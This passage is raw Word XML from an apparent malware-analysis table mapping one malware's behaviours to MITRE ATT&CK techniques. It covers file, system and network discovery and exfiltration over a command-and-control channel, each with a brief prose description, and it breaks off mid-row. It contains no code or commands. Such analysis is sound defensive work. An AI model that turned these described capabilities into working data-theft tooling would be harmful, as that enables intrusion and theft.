      <w:tr w:rsidR="00F423B5" w:rsidRPr="00B857D7" w14:paraId="41B92402" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5435C9CF" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00B857D7" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E8BE6F6" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00B857D7" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48284043" w14:textId="347F4E7A" w:rsidR="00F423B5" w:rsidRPr="00B857D7" w:rsidRDefault="00F423B5" w:rsidP="0011494A">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 xml:space="preserve">1083 </w:t>
            </w:r>
            <w:r w:rsidR="009C146D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="009C146D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>File and Directory Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B361C76" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00B857D7" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75EEB7B3" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00B857D7" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="620A5040" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00B857D7" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40B59BC4" w14:textId="1A53C511" w:rsidR="00F423B5" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="122572FE" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00B857D7" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA46D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Recursively generate a list of files in a directory and send to the control server  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A26835" w:rsidRPr="00B857D7" w14:paraId="561927C6" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A7FA68C" w14:textId="0D778678" w:rsidR="00A26835" w:rsidRPr="00B857D7" w:rsidRDefault="005D23AA" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E252219" w14:textId="77777777" w:rsidR="00A26835" w:rsidRPr="00B857D7" w:rsidRDefault="00A26835" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0199FFBD" w14:textId="7C619459" w:rsidR="00A26835" w:rsidRPr="00B857D7" w:rsidRDefault="00A26835" w:rsidP="0011494A">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108</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D80D7C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00D80D7C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00662C2C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>System Information</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BF4A34C" w14:textId="4284ABBC" w:rsidR="00A26835" w:rsidRPr="00B857D7" w:rsidRDefault="00C92A34" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43293F7A" w14:textId="77777777" w:rsidR="00A26835" w:rsidRPr="00B857D7" w:rsidRDefault="00A26835" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2074F863" w14:textId="77777777" w:rsidR="00A26835" w:rsidRPr="00B857D7" w:rsidRDefault="00A26835" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4269ADA7" w14:textId="365E383F" w:rsidR="00A26835" w:rsidRPr="00B857D7" w:rsidRDefault="00A452DC" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B37C8A4" w14:textId="14E582F7" w:rsidR="00A26835" w:rsidRPr="00B857D7" w:rsidRDefault="00A26835" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA46D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00ED5A28">
              <w:t>Send information for all drives</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00720C6D" w:rsidRPr="00B857D7" w14:paraId="582E547E" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="009B631D" w14:textId="2D955FB1" w:rsidR="00720C6D" w:rsidRPr="00B857D7" w:rsidRDefault="00720C6D" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E728C1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="643605C8" w14:textId="77777777" w:rsidR="00720C6D" w:rsidRPr="00B857D7" w:rsidRDefault="00720C6D" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0788B6FB" w14:textId="5CFE2A4D" w:rsidR="00720C6D" w:rsidRPr="00B857D7" w:rsidRDefault="00720C6D" w:rsidP="0011494A">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10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> System </w:t>
            </w:r>
            <w:r w:rsidR="001677EA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Network Configuration</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22E07AA6" w14:textId="686A8E5B" w:rsidR="00720C6D" w:rsidRPr="00B857D7" w:rsidRDefault="00E728C1" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18CE0660" w14:textId="77777777" w:rsidR="00720C6D" w:rsidRPr="00B857D7" w:rsidRDefault="00720C6D" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32D76313" w14:textId="77777777" w:rsidR="00720C6D" w:rsidRPr="00B857D7" w:rsidRDefault="00720C6D" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C008D59" w14:textId="7BD8E4E6" w:rsidR="00720C6D" w:rsidRPr="00B857D7" w:rsidRDefault="00A452DC" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C3B40B7" w14:textId="5A7E446D" w:rsidR="00720C6D" w:rsidRPr="00B857D7" w:rsidRDefault="00720C6D" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA46D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:t>Gather network addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="004A37AE" w14:paraId="056A95EE" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76A7413B" w14:textId="46396279" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F13818">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="097E72D7"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53086611" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="0035641D" w:rsidRDefault="00F423B5" w:rsidP="0011494A">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04406A5A" w14:textId="5F57A6FE" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00C92A34" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F13818">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="363CBFCF" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53973C1E" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BEA3585" w14:textId="6CFD8F82" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00A452DC" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13141B5E" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:r>
              <w:t>[1] After every action is performed the malware sends a response to the control server indicating whether the action was successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="005E7360" w14:paraId="39C119B0" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65068873" w14:textId="2E58764C" w:rsidR="00F423B5" w:rsidRPr="005E7360" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F13818">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46AD9E6F" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="005E7360" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DA3EF6E" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="005E7360" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1041 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
